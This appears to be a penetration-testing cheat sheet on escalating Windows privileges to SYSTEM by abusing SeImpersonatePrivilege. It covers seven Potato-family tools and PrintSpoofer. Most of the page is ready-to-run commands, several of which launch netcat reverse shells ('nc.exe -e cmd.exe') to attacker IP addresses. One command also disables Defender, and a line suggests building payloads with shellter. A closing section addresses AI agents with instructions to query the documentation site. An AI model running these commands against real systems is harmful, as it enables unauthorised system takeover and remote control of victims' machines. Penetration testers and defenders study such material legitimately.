# SeImpersonatePrivilege

This method takes advantage of SeImpersonatorPrivilege or SeAssignPrimaryTokenPrivelge privelges to elevate the privilege from local to system. This is usually enabled by default when <mark style="color:blue;">IIS</mark> or <mark style="color:blue;">SQL</mark> services are installed.&#x20;

The status can be checked using the following command,

```
whoami /priv
```

### HotPotato

It was the first potato and was discovered by Stephen Breen. It can be downloaded from [here](https://github.com/foxglovesec/Potato). DCOM has to be enabled for this attack to work.

```
Potato.exe -ip -cmd [cmd to run] -disable_exhaust true -disable_defender true
```

### JuicyPotato

Juicypotato is a privilege escalation tool created by Andrea Pierini and Giuseppe Trotta.&#x20;

A COM server with unique CLSID is required for exploiting this vulnerability. You can get the CLSID from the predefined list put together by the author [here](http://ohpe.it/juicy-potato/CLSID/).&#x20;

Alternatively, you can also find the CLSID that will work on the target system by using the following series of scripts,

Load the following PS script,

{% embed url="<https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1>" %}

Then use the following script to generate the list of possible CLSID,

{% embed url="<https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1>" %}

The following script will then try all the CLSID that you generated to find a vulnerable one,

{% embed url="<https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat>" %}

Once we have everything we need we can use the Juicypotato to elevate the privilege by executing Netcat and have it do a reverse shell back to your machine,

```
JuicyPotato -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 192.168.1.11 443" -t *
```

You can also craft a common executable with the malicious payload using tools like "shellter" and have it executed from the target system through Juicypotato.&#x20;

> JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards.

### JuicyPotatoNG

This is the next iteration of the JuicyPotato and it can be downloaded from [here](<https://github.com/antonioCoco/JuicyPotatoNG/releases/tag/v1.1 >).&#x20;

```
.\JuicyPotatoNG.exe -t * -p "C:\Windows\system32\cmd.exe" -a "/c C:\temp\nc64.exe 192.168.45.180 4433 -e cmd.exe"
```

### PrintSpoofer64

The executable can be downloaded from [here](https://github.com/itm4n/PrintSpoofer/releases).&#x20;

```
.\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"
```

### RoguePotato

The executable can be downloaded from [here](https://github.com/antonioCoco/RoguePotato).

```
.\RoguePotato.exe -r YOUR_IP -e "C:WRITABLE_DIRECTORY\rs443.exe" -l 9999
```

### GodPotato

The executable can be downloaded from [here](https://github.com/BeichenDream/GodPotato).

```
.\GodPotato-NET35.exe -cmd "C:\Users\john\Desktop\rs4444.exe"
```

### SharpEfsPotato

The executable can be downloaded from [here](https://github.com/bugch3ck/SharpEfsPotato).&#x20;

```
SharpEfsPotato.exe -p "C:\Windows\system32\cmd.exe" -a "/c C:\temp\nc64.exe 192.168.45.180 4433 -e cmd.exe"
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.particle42.com/windows/windows-pe/seimpersonateprivilege.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.